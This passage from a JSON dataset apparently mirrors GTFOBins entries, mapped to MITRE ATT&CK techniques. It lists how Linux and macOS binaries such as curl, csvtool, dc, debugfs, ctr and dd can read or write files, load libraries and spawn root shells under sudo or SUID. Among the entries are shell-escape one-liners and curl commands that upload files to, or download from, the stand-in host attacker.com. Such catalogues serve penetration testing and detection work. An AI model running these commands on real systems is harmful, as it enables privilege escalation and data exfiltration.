Escalation"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-read:0:suid","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-read:0:unprivileged","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-write:0:sudo","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-write:0:suid","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csplit:file-write:0:unprivileged","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csplit/"]},{"id":"gtfo:csvtool:file-read:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-read:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-read:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-write:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-write:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:file-write:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:shell:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:shell:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:csvtool:shell:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"]},{"id":"gtfo:ctr:shell:0:sudo","toolId":"gtfo:ctr","toolName":"ctr","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ctr run --rm --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest x","description":"An image must be already present, for example:\n\n```\nctr images pull docker.io/library/alpine:latest\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ctr/"]},{"id":"gtfo:ctr:shell:0:suid","toolId":"gtfo:ctr","toolName":"ctr","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ctr run --rm --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest x","description":"An image must be already present, for example:\n\n```\nctr images pull docker.io/library/alpine:latest\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ctr/"]},{"id":"gtfo:cupsfilter:file-read:0:sudo","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"]},{"id":"gtfo:cupsfilter:file-read:0:suid","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"]},{"id":"gtfo:cupsfilter:file-read:0:unprivileged","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"]},{"id":"gtfo:curl:download:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:download:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:download:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-read:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-read:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-read:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-write:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-write:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-write:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:library-load:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:library-load:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:library-load:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:1:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:1:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:1:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:2:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:2:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:2:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:cut:file-read:0:sudo","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cut/"]},{"id":"gtfo:cut:file-read:0:suid","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cut/"]},{"id":"gtfo:cut:file-read:0:unprivileged","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cut/"]},{"id":"gtfo:dash:file-write:0:sudo","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:file-write:0:suid","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:file-write:0:unprivileged","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:shell:0:sudo","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:shell:0:suid","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:shell:0:unprivileged","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:date:file-read:0:sudo","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/date/"]},{"id":"gtfo:date:file-read:0:suid","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/date/"]},{"id":"gtfo:date:file-read:0:unprivileged","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/date/"]},{"id":"gtfo:dc:shell:0:sudo","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dc/"]},{"id":"gtfo:dc:shell:0:suid","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dc/"]},{"id":"gtfo:dc:shell:0:unprivileged","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dc/"]},{"id":"gtfo:dd:file-read:0:sudo","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-read:0:suid","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-read:0:unprivileged","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-write:0:sudo","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-write:0:suid","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-write:0:unprivileged","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:debugfs:shell:0:sudo","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/debugfs/"]},{"id":"gtfo:debugfs:shell:0:suid","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/debugfs/"]},{"id":"gtfo:debugfs:shell:0:unprivileged","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/debugfs/"]},{"id":"gtfo:dhclient:shell:0:sudo","toolId":"gtfo:dhclient","toolName":"dhclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dhclient -sf /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dhclient/"]},{"id":"gtfo:dhclient:shell:0:unprivileged","toolId":"gtfo:dhclient","toolName":"dhclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dhclient -sf /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dhclient/"]},{"id":"gtfo:dialog:file-read:0:sudo","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dialog/"]},{"id":"gtfo:dialog:file-read:0:suid","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dialog/"]},{"id":"gtfo:dialog:file-read:0:unprivileged","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dialog/"]},{"id":"gtfo:diff:file-read:0:sudo","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:0:suid","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:0:unprivileged","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:1:sudo","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:1:suid","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:1:unprivileged","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:dig:file-read:0:sudo","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dig/"]},{"id":"gtfo:dig:file-read:0:suid","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dig -f 